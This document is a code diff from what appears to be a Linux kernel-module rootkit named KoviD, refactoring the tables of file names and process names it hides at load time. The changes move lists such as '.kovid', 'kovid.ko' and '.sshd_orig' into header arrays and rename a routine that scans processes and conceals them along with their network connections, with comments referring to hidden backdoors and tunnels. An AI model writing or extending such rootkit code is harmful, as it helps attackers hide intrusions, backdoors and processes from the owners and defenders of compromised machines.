Kvdev

src/kovid.c

@@ -682,12 +682,6 @@ static int __init kv_init(void) {
 #if LINUX_VERSION_CODE >= KERNEL_VERSION(5,17,0)
     struct kernel_syscalls *kaddr = NULL;
 #endif
-    const char *names[] = {
-        ".kovid", "kovid", "kovid.ko", ".kv.ko", ".lm.sh", ".sshd_orig",
-        "whitenose", "pinknose", "rednose", "greynose", "purplenose",
-        "blacknose", "bluenose", NULL
-    };
-
     if (strlen(PROCNAME) == 0) {
         procname_err = "Empty PROCNAME build parameter. Check Makefile.";
     } else if (!strncmp(PROCNAME, "changeme", 5)) {
@@ -734,14 +728,11 @@ static int __init kv_init(void) {
     kv_hide_task_by_pid(tsk_prc->pid, 0, CHILDREN);
 
     /** hide magic filenames & directories */
-    fs_add_name_ro(names);
+    fs_add_name_ro(kv_hide_str_on_load);
 
-    /** Hide network applications that match
-     * the names defined in netapp.h
-     * tunnels, external backdoors...
-     * Run once
-     */
-    kv_scan_and_hide_netapp();
+    /** hide magic filenames, directories and processes */
+    fs_add_name_ro(kv_hide_ps_on_load);
+    kv_scan_and_hide();
 
 #ifndef DEBUG_RING_BUFFER
     /** *pr_info because it must be shown even if DEPLOY=1 */

src/lkm.h

@@ -132,7 +132,7 @@ bool kv_for_each_hidden_backdoor_data(bool (*cb)(__be32, void *), void *);
 void kv_reload_hidden_task(struct task_struct *task);
 void kv_pid_cleanup(void);
 void kv_show_saved_tasks(void);
-void kv_scan_and_hide_netapp(void);
+void kv_scan_and_hide(void);
 
 /** syscall,function addresses */
 struct kernel_syscalls *kv_kall_load_addr(void);
@@ -160,6 +160,24 @@ char *kv_util_random_AZ_string(size_t);
 /** VM operations */
 unsigned long kv_get_elf_vm_start(pid_t);
 
+ /*
+  * Hide these process names during load
+  * children included
+ */
+static const char *kv_hide_ps_on_load[] = {
+    "whitenose", "pinknose", "rednose", "blacknose",
+    "greynose", "purplenose", "bluenose", NULL
+};
+
+/*
+ * Hide these names from write() fs output
+ */
+static const char *kv_hide_str_on_load[] = {
+    ".kovid", "kovid", "kovid.ko", ".kv.ko",
+    ".lm.sh", ".sshd_orig", NULL
+};
+
+
 // PP_NARG from
 // https://groups.google.com/forum/#!topic/comp.std.c/d-6Mj5Lko_s
 #define PP_NARG(...) \

src/pid.c

@@ -16,7 +16,6 @@
 #include <linux/inet.h>
 #include "lkm.h"
 #include "fs.h"
-#include "netapp.h"
 
 static LIST_HEAD(tasks_node);
 #ifdef DEBUG_RING_BUFFER
@@ -455,7 +454,7 @@ bool kv_for_each_hidden_backdoor_data(bool (*cb)(__be32, void *), void *priv) {
  * that this function also conceals the connections of network applications.
  * For more information, refer to 'netapp.h'.
  */
-void kv_scan_and_hide_netapp(void) {
+void kv_scan_and_hide(void) {
     struct task_struct *t;
 
     for_each_process(t) {
@@ -466,14 +465,13 @@ void kv_scan_and_hide_netapp(void) {
         if (kv_find_hidden_task(t)) continue;
         if (!(fnode = fs_get_file_node(t))) continue;
 
-        /* XXX: optimise this */
-        for (; netapp_list[i] != NULL; ++i) {
-            if (strncmp(netapp_list[i], t->comm, strlen(netapp_list[i]))) continue;
-            prinfo("Hide netapp task: %d %s i=%d '%s'\n", t->pid, fnode->filename, i, netapp_list[i]);
+        for (; kv_hide_ps_on_load[i] != NULL; ++i) {
+            if (strncmp(kv_hide_ps_on_load[i], t->comm, strlen(kv_hide_ps_on_load[i]))) continue;
+            prinfo("Hide task name '%s' from '%s' of pid %d\n", t->comm, fnode->filename, t->pid);
             /**
              * notice that any netapp added here
              * will NOT be killed if kv is unloaded
-             * In reality an application that is listed in netapp_list will be handled
+             * In reality an application that is listed in kv_hide_ps_on_load will be handled
              * in the same way as if you manually hide a parent process:
              *  echo <pid of parent> >/proc/kv
              */